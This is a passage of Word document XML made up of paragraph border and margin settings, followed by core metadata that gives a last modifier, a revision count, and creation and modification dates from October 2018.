              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="71971460">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="170873849">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="229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2CC9-B946-4D2C-AC2E-61849F63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7</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Joshua Gould</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-22T12:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-30T01:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>